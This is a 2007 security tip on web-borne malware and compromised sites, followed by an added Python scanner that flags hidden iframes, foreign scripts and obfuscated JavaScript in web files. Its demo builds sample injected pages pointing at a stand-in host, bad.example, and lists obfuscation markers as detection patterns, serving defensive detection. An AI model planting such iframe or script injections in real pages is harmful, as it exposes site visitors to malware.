Tip

Keeping the AJAX door closed

Q: My end-users are spending a lot of time on Web 2.0 sites that use a lot of AJAX and other new technologies. Does this open any new attack vectors into our organisation?

A: Yes, but not just "because it's Web 2.0." Very many sites these days rely on some sort of client-side scripting, usually JavaScript (the "J" in "AJAX") or VBScript, regardless of whether they see themselves as part of Web 2.0 or not. This means that the web browser has almost turned into an operating system plus application stack of its own. Unsurprisingly, this also means that cybercriminals are switching their malware distribution mechanisms from email to the web.

Recent Sophos stats show that over 70% of new web-borne malware is hosted on compromised sites, often inside businesses -- not on sites deliberately set up for criminal misuse. In other words, we, the Good Guys, are collectively providing more than two-thirds of the malware delivery ammo available to web-savvy cybercriminals. And Sophos turns up an average of about 5000 new URLs hosting malware (are you ready for this?) per _day_.

(Some days it's many more than that.)

Solutions:

  1. Web security begins at home. Make sure your own company's web presence is patched and safe against remote compromise, whether from without or within. An internal infection of the Psyme family of malware, for instance, can inject malicious code into thousands of HTML and PHP files on your servers in minutes. Keep that anti-virus and those OS/application patches up-to-date, on servers and workstations.

  2. Consider going for a web filtering solution which is focused on security, not just staff productivity. Blocking outward access to disallowed porn and gambling sites is probably very important. But active malware filtering of all inbound data, even from apparently legitimate sites, is a must these days. To look for malicious scripts, iframes and the like in downloaded HTML pages, or to spot exploit shellcode in apparently-innocent pictures or cursor files, you probably need specialist help from a commercial product.
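Both items above come down to the same check: spot injected markup, either in the pages sitting on your own web servers (item 1) or in the HTML coming in through the proxy (item 2). The following is an added example written for this page; it is not code from the original tip and not how any Sophos product works. It is a small heuristic scanner: hidden iframes (0/1-pixel or display:none), script tags pulling from hosts you do not own, and inline scripts that look obfuscated (eval/unescape/fromCharCode/document.write plus long runs of %XX escapes). The scan_tree/shared_payloads pair walks a web root and counts how many files carry the identical payload, which is the tell-tale of a mass injection of the kind the tip describes. The hostnames (www.example.com, bad.example), the sample pages and the temporary web root are all constructed for the demo.

```python
"""Heuristic scanner for injected <script>/<iframe> payloads in HTML and PHP files.
Added example, not code from the original tip or any Sophos product; hostnames
(www.example.com, bad.example) and the sample pages below are constructed."""
import os
import re
import tempfile
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, List
from urllib.parse import urlparse

@dataclass(frozen=True)
class Finding:
    kind: str    # hidden_iframe | external_script | obfuscated_script
    detail: str  # the src URL, or the markers that triggered the finding

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script\s*>", re.I | re.S)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
# width/height of 0 or 1 pixel, or CSS that hides the frame outright
TINY_DIM_RE = re.compile(r"""\b(?:width|height)\s*=\s*["']?\s*[01]\s*(?:px)?\s*["'\s/>]""", re.I)
HIDDEN_CSS_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
# long runs of %XX or \xNN escapes, as in document.write(unescape('%3C%73...'))
ESCAPE_RUN_RE = re.compile(r"(?:%[0-9a-f]{2}){16,}|(?:\\x[0-9a-f]{2}){16,}", re.I)
OBFUSCATION_MARKERS = ("eval(", "unescape(", "fromcharcode(", "document.write(")

def _src_of(tag: str) -> str:
    m = SRC_RE.search(tag)
    return m.group(1) if m else ""

def _is_foreign(url: str, own_hosts: Iterable[str]) -> bool:
    host = urlparse(url).hostname  # None for relative URLs such as /js/app.js
    return bool(host) and host.lower() not in {h.lower() for h in own_hosts}

def scan_html(html: str, own_hosts: Iterable[str] = ()) -> List[Finding]:
    """Return heuristic findings for one document (an inbound page or an own file)."""
    own_hosts = tuple(own_hosts)
    findings: List[Finding] = []
    for tag in IFRAME_RE.findall(html):
        if TINY_DIM_RE.search(tag) or HIDDEN_CSS_RE.search(tag):
            findings.append(Finding("hidden_iframe", _src_of(tag) or tag))
    for attrs, body in SCRIPT_RE.findall(html):
        src = _src_of(attrs)
        if src and _is_foreign(src, own_hosts):
            findings.append(Finding("external_script", src))
        lowered = body.lower()
        hits = [m for m in OBFUSCATION_MARKERS if m in lowered]
        if ESCAPE_RUN_RE.search(body):
            hits.append("escape_run")
        # a single marker is common in benign code; demand two, or an escape run
        if len(hits) >= 2 or "escape_run" in hits:
            findings.append(Finding("obfuscated_script", ",".join(hits)))
    return findings

def scan_tree(root: str, own_hosts: Iterable[str] = ()) -> Dict[str, List[Finding]]:
    """Walk a web root; return {path: findings} for every HTML/PHP file that raises any."""
    results: Dict[str, List[Finding]] = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith((".html", ".htm", ".php")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_html(fh.read(), own_hosts)
                if found:
                    results[path] = found
    return results

def shared_payloads(results: Dict[str, List[Finding]]) -> Counter:
    """Files per identical payload: one bad src in many files is a mass-injection signature."""
    counts: Counter = Counter()
    for findings in results.values():
        for f in set(findings):
            counts[(f.kind, f.detail)] += 1
    return counts

# Constructed sample pages (not real sites)
CLEAN_PAGE = """<html><head><script src="/js/app.js"></script>
<script>document.getElementById("x").textContent = "hello";</script></head>
<body><iframe src="https://www.example.com/widget" width="300" height="200"></iframe></body></html>"""
_PAYLOAD = "".join("%%%02X" % ord(c) for c in '<script src="http://bad.example/x.js"></script>')
INJECTED_PAGE = CLEAN_PAGE + (
    '\n<iframe src="http://bad.example/in.cgi?3" width="0" height="0"></iframe>\n'
    '<script src="http://bad.example/x.js"></script>\n'
    "<script>document.write(unescape('" + _PAYLOAD + "'));</script>\n"
)

def run_demo(copies: int = 5) -> Counter:
    """Build a throwaway web root with one clean page and `copies` injected pages,
    scan it, and return the per-payload file counts."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "index.html"), "w", encoding="utf-8") as fh:
            fh.write(CLEAN_PAGE)
        os.mkdir(os.path.join(root, "blog"))
        for i in range(copies):
            with open(os.path.join(root, "blog", f"post{i}.php"), "w", encoding="utf-8") as fh:
                fh.write(INJECTED_PAGE)
        return shared_payloads(scan_tree(root, own_hosts=("www.example.com",)))

if __name__ == "__main__":
    for (kind, detail), n in run_demo().most_common():
        print(f"{n:3d} file(s): {kind} -> {detail}")
```

With the defaults, run_demo() reports each of the three injected payloads in 5 of 5 blog files and nothing for index.html. Point scan_tree at a real document root (with your own hostnames in own_hosts) to get the item-1 check; feed scan_html the body of a proxied response to get a crude version of the item-2 check. These are signature-free heuristics, so expect false positives from legitimate minified code that uses eval or document.write; the "same payload in many files" count is the more reliable signal.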


This was first published in May 2007

Disclaimer: Our Tips Exchange is a forum for you to share technical advice and expertise with your peers and to learn from other enterprise IT professionals. TechTarget provides the infrastructure to facilitate this sharing of information. However, we cannot guarantee the accuracy or validity of the material submitted. You agree that your use of the Ask The Expert services and your reliance on any questions, answers, information or other materials received through this Web site is at your own risk.